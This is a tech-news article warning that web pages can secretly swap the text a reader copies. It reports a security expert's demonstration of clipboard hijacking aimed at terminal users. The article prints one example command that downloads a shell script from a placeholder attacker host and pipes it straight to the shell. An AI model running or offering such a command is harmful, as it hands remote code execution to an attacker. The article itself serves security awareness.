How copy & paste can get you in more trouble than you think

News

Reading time icon 3 min. read

Calendar icon Published on

by Alexandru Poloboc 

published on

Share this article

Readers help support Windows Report. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help Windows Report sustain the editorial team Read more

Key notes

  • We all copy and paste from the internet on a daily basis without actually knowing the risks.
  • A security expert took the time to show everyone a worst-case scenario when doing this.
  • Pasting commands you got from the internet into your terminal is a quick way to get hacked
  • So, what at first glance appears to be harmless digital commands are actually malicious codes.
hacker

It’s true that we live in an era where speed is everything, and getting fast results is all that matters. However, few people actually stop for a second and think about repercussions.

On a daily basis, millions of programmers, admins, and security researchers are performing simple tasks like copying and pasting commands from web pages directly into consoles on their PCs.

Although many don’t even give this a second thought, the implications are bigger and more perilous than you might think at first, especially if you are storing sensitive or valuable data.

A well-known security expert took the time to share what could actually happen if you copy+paste content from web pages.

Copy+Paste is an easy way to actually get hacked

Gabriel Friedlander, who is the founder of security awareness training platform Wizer, pulled the cover off a scheme that’ll make you think twice before copying and pasting commands from web pages.

Copying and pasting content from the internet has become so common nowadays, that nobody even gives it a second thought.

However, Friedlander warns that some web pages are more deceitful than one might realize at first, and what you think you copied from it is very different from what you actually did.

And the worse part about all this is that, without the necessary knowledge or guidance, victims only realize their mistake after pasting the text, at which point it may already be too late.

The security analyst also devised a little test for his blog readers, just so people can actually understand how easy it is for you to unwillingly open the door for cybercriminals.

He provided a command that is meant to be copied, but the concerning truth is only uncovered when you paste the text and see what you actually introduced in your setup.

After copying the command shown in the screenshot above, the result of pasting it will shock you, as it is far from what you thought you were duplicating.

curl http://attacker-domain:8000/shell.sh | sh

Besides the totally different command present on your clipboard, the newline (or return) character at the end of it means the above example would execute as soon as it’s pasted directly into a Linux terminal.

So you better be more aware of what actually happens and treat this as a serious safety hazard. We’re not saying all websites hide malicious content, but it pays to take this into consideration.

Have you ever got hacked from pasting dodgy commands into your terminal? Share your experience with us in the comments section below.

More about the topics: malware

Alexandru Poloboc

Alexandru Poloboc Shield

Tech Journalist

With an overpowering desire to always get to the bottom of things and uncover the truth, Alex spent most of his time working as a news reporter, anchor, as well as TV and radio entertainment show host. A certified gadget freak, he always feels the need to surround himself with next-generation electronics. When he is not working, he splits his free time between making music, gaming, playing football, basketball and taking his dogs on adventures.